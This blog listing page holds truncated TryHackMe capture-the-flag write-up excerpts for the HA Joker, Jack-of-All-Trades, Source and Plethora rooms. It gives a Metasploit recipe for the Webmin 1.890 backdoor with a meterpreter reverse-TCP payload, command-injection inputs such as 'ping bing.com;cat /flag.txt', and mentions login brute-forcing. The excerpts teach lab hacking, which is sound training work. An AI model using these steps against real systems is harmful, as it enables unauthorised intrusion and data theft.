Skip to main content

Posts

HA Joker CTF   TryHackMe | HA Joker CTF this room is medium rated  first of all, as we used to do we will run Nmap scan against our target    as we can see you have three ports open ssh and two HTTP services so let's take a look at web app that is running on port 80   we have here a web page with a lot of joker's quotes  let's take a look at the page source to see if there any interesting info we can find    hmm there is no useful info so let's visit the second service on port 8080 it requires a username and password to access this page ok let's run gobuster against port 80 and what will we find  great we found some directories and some answers also  one of those files you will found contains a username, note it and now we have a username  time to get its password we will use brute force attack to gain access to services on port 8080  but the hint says that this username and password encoded with base64 so let's run burp ...
Post a Comment
Read more
Recent posts

Jack-of-All-Trades

Jack-of-All-Trades TryHackMe | Jack-of-All-Trades First of all, this write up is quite long so be patient and stay tunned coz it's a fun box and you may  learn something new so take your notes and let's jump into this machine starting with enumeration we ganna use Nmap for that to see what ports and services are running as we can see there are web service and ssh but both of them running on different ports so keep that in mind  let's go to the website and check this out but first, we need to allow HTTP to run port 22 you need to follow these steps  1- Select and copy the following preference name network.security.ports.banned.override 2- In a new tab, type or paste about:config in the address bar and press Enter/Return. Click the button promising to be careful. 3- In the search box above the list, type or paste ports and pause while the list is filtered If the above-listed preference exists: 4- Double-click it and add a comma to the end of the list followed by the port nu...
Post a Comment
Read more

Source

Source TryHackMe | Source source is a new room at the time this write-up has done so let's get started  as we can see before we so any think there is a hint in-room description  "Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool" we can see here that services are running called Webmin and it says that Webmin is a web-based system configuration tool let's run Nmap and see what we will get while Nmap is running let's take a look at Webmin vulnerabilities looks like there are remote code execution in some versions so let's back to Nmap results and see what version we have  as we can see it's running on 1.890 version the good news is this version is vulnerable to Webmin password_change.cgi Backdoor this vulnerability has an exploit in Metasploit  you need to use exploit/unix/webapp/webmin_backdoor  set payload linux/x64/meterpreter/reverse_tcp set RHOST "machine-IP" set LHOST "your-IP" >> you can ge...
Post a Comment
Read more

Plethora

Plethora Tryhackme | Plethora   we will start with enumeration we ganna use Nmap to see what ports and services are running  as we can see we have a lot keep them in txt file we ganna use some of them later but for now we have port 80 is open which means wh have a web service up and running  as we can see we have a web page  let's take a look at the source page  ok let's open one by one of that machines let's start with DVWA ------------------------------------ DVWA DVWA is a well-known vul machine with username: admin and password: password  log in and go to command injection tap this vulnerability is about running a command on the server side so  we ganna use it to capture our flag  use: ping bing.com;cat /flag.txt flag 1 Done! ✌ ------------------------------------ XVWA as we did with DVWA we ganna do it here navigate to OS Command injection tap  and run this  use: ping bing.com;cat /flag.txt flag 2 Done! ✌ ---------------------------...
Post a Comment
Read more